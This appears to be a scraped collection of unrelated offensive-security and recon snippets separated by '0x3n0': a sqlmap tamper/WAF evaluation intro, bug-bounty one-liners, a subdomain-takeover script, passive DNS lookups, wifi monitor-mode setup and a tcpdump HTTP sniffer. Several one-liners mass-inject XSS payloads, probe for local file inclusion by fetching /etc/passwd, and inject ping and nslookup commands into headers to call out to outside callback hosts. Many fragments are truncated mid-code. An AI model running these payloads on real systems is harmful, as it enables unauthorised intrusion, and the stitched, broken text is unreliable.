0x3n0

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY

Below names are to be passed to the --tamper= parameter of sqlmap.

The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.

The scale is 0-5.

0x3n0

#!/bin/bash

function usage () {
    echo "usage: yt"
    echo "    -h        help"
    echo "    -c        channels/subscriptions"
    echo "    -s query  search"
    echo "    -g / -r   gui mode (rofi/dmenu)"
    echo "    -m        music mode (audio only) [dont use with -r]"
    echo "  nothing     use defaults (search from prompt)"

0x3n0

# Check email provider

#!/usr/bin/python3
import aiohttp
import asyncio
import argparse
import base64
import datetime
import json
import logging

0x3n0

### one liner ###
gauplus https://redacted.org | uro | grep ".php" | grep -i get | sed 's/.*.get//' | cut -f1 -d"." | sed 's/[A-Z]\+/\n&/g' | sort -u
##################

gauplus https://redacted.org/ | uro | grep ".php" > php-files.txt

cat php-files.txt| grep -i get | sed 's/.*.get//' | sort -u

cat php-files.txt| grep -i get | sed 's/.*.get//' | cut -f1 -d"." | sort -u

0x3n0

assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done
 
assetfinder https://exmple.com | gau --subs https://exmple.com  | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
  
gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done
  
### DNS rebinding for RCE
gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H 

0x3n0

import json, asyncio, pickle, os
from pathlib import Path
from takeover.takeover import takeover

home = str(Path.home())

# config is an dictionary. See ~/.config/takeover/config.json for structure
config = json.load(open(home + "/.config/takeover/config.json"))

# Do not forget to replace pointer to fingerprints with the valid data. See ~/.config/takeover/fingerprints.json for structure

0x3n0

#!/usr/bin/env zsh
rm ~/recon -rf

mkdir ~/recon
cd ~/recon

curl -O "https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json"

cat chaos-bugbounty-list.json | jq -r '.programs[].name' | while read folder; do mkdir -p "$folder"; done

0x3n0

for i in `cat  IP.txt`; do curl -s -X POST https://api.mnemonic.no/pdns/v3/search -H 'Content-Type: application/json' --data "{\"query\":\"$i\"}" | jq . | egrep "query" | awk -F: '{print $2 }' | cut -d'"' -f2 | anew last ;done

or add to .bashrc

mn(){
  curl -s -X POST https://api.mnemonic.no/pdns/v3/search -H 'Content-Type: application/json' --data "{\"query\":\"$1\"}" | jq . | egrep "query" | awk -F: '{print $2 }' | cut -d'"' -f2
}

0x3n0

1. Connect wireless WIFI card, change name of intf identifier to wlan1, set up monitor mode

# check list of interfaces
ip a

# change the interface name
sudo ip link set wlxd03745ed27d0 down
sudo ip link set wlxd03745ed27d0 name wlan1
sudo ip link set wlan1 up

0x3n0

 tcpdump -i ens192 -A -s 10240 'tcp port 80' | grep -v IP | egrep --line-buffered "..(GET |\.HTTP\/|POST |HEAD )|^[A-Za-z0-9-]+: " |sed -r 's/..(GET |HTTP\/|POST |HEAD )/\n\n\1/g'